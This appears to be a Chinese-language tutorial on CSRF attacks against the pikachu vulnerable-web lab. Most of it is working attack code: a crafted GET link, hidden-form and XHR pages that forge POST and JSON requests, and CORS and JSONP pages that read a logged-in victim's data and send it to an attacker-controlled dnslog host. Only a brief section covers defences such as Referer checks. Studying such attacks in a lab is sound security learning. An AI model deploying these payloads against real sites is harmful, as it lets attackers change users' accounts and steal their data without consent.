前言
CSRF的本质就是在不知情的情况下执行请求
CSRF的原理: 利用cookie在浏览器不过期的操作,使攻击者构造恶意的payload来修改用户的信息等
CSRF发生条件:当用户在安全网站A登录后保持登录的状态,并同时浏览了保存有恶意代码的另一个网站B,此时B网站劫持用户的浏览器并以用户登录的状态对A网站发送非用户本人操作的请求。
环境:pikachu靶场
CSRF漏洞挖掘的技巧
一般检查请求包中请求头referer | token | auth是否生效 如果都不生效就很有可能存在csrf漏洞
操作型CSRF
GET
通过修改超链接中的参数来修改个人信息
通过上图我们看见成功修改了个人信息中的数据
接下来我们直接构造一个恶意的URL 结合社会工程学让别人点击这个链接就可以修改受害者的信息了
http://192.168.101.190/pikachu/vul/csrf/csrfget/csrf_get_edit.php?sex=1&phonenum=1&add=1&email=1&submit=submit
POST
常规POST包
从上图中请求方法是POST 然后请求体是准备要修改的数据并且请求行里面没有referer token等字段 所以我们构造的HTML如下:
<html>
<body>
<h1>CSRF-POST伪造包</h1>
<!-- <script>history.pushState('', '', '/')</script> -->
<form action="http://192.168.101.190/pikachu/vul/csrf/csrfpost/csrf_post_edit.php" method="POST">
<input type="hidden" name="sex" value="3" />
<input type="hidden" name="phonenum" value="2" />
<input type="hidden" name="add" value="2" />
<input type="hidden" name="email" value="2" />
<input type="hidden" name="submit" value="submit" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
最后修改成功
POST_JSON的包
POST /webnet/edit HTTP/1.1
Host: www.xxx.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/json; charset=utf-8
Content-Length: 85
Cookie: testcookie=yes; ASP.NET_SessionId=5udmqb45qoypdc55mfp1w4vy
{"pSpotId":"120201","pSignTimes":"70","pModuleID":"207","pSceneid":"120201007000046"}
如上所示请求体是json数据结构 我们构造的html如下所示:
<html>
<body>
<script>
function submitRequest() {
var xhr = new XMLHttpRequest();
xhr.open("POST", "http://www.xxx.com/webnet/edit", true);
xhr.setRequestHeader("Accept", "*/*");
xhr.setRequestHeader("Accept-Language", "zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3");
xhr.setRequestHeader("Content-Type", "application/json; charset=utf-8");
xhr.withCredentials = true;
xhr.send(JSON.stringify({"pSpotId":"120201","pSignTimes":"70","pModuleID":"207","pSceneid":"120201007000046"});
}
</script>
<form action="#">
<input type="button" value="Submit request" onclick="submitRequest();"/>
</form>
</body>
</html>
读取型CSRF
CORF(跨源资源共享)
防御:
验证 HTTP Referer 字段
在 HTTP 头中自定义属性并验证
当浏览器发现某个请求不符合同源策略就会给该请求加一个请求头:
Origin
后台进行处理,如果确认接受请求则在返回结果中加入一个响应头:Access-Control-Allow-Origin
浏览器会判断该响应头中是否包含Origin的值,如果不包含浏览器直接驳回,这时我们无法拿到响应数据
在配置了cors的前提下,当你登录网站a.com,并跨域访问网站b.com的时候,浏览器判断你的操作时跨域,这时会在请求包里面加一个origin字段,内容为:Origin:b.com 这样你就能跨域了,当cors的配置错误时就会产生cors漏洞 【我给你发一个html,我就可以获取你当前页面的数据】
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>CSRF-CORS</title>
</head>
<body>
<div id="output"></div>
<script src="http://www.w3school.com.cn/jquery-1.11.1.min.js"></script>
<script type="text/javascript">
var req = new XMLHttpRequest();
req.onload = reqListener;
req.open('get','http://127.0.0.1/pichachu',true)//攻击网站的url
req.withCredentials = true;
req.send();
function reqListener(){
$.ajax({
type:'get',
url:'http://dnslog.com',//自己的dnslog
data:json.stringify(req.responseText)
});
};
</script>
</body>
</html>
JSONP
只支持get请求方式
script标签可以加载其它域下的js,我们可以利用这个特性实现从其他域下获取数据.通过
<script src="http://127.0.0.1:8080/name"></script>
这时会向接口发送获取数据,获取数据后作为js来执行.但是这个数据时json格式的,直接作为js运行的话会报错,这时候我们就可以在src后面加上一个回调函数showData
<script src="http://127.0.0.1:8080/name ? callback=showData"></script>
在链接里面修改callback的值会发生变化说明就有jsonp漏洞http://127.0.0.1:8080/name ? callback=123.
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>CSRF-JSONP</title>
</head>
<body onload="load()">
<script src="http://www.w3school.com.cn/jquery-1.11.1.min.js"></script>
<script>
function load(){
$.ajax({
url:"http://127.0.0.1/pikachu",
type:"GET",//指定请求方法
dataType:"jsonp",//指定服务器返回的数据类型
jsonp:"callback",//指定参数名称
jsonpCallback:"abc123",
success: function(data){
$.ajax({
type:'get',
url:'http://dnslog.com',
data:JSON.stringify(data)
});
}
});
}
</script>
</body>
</html>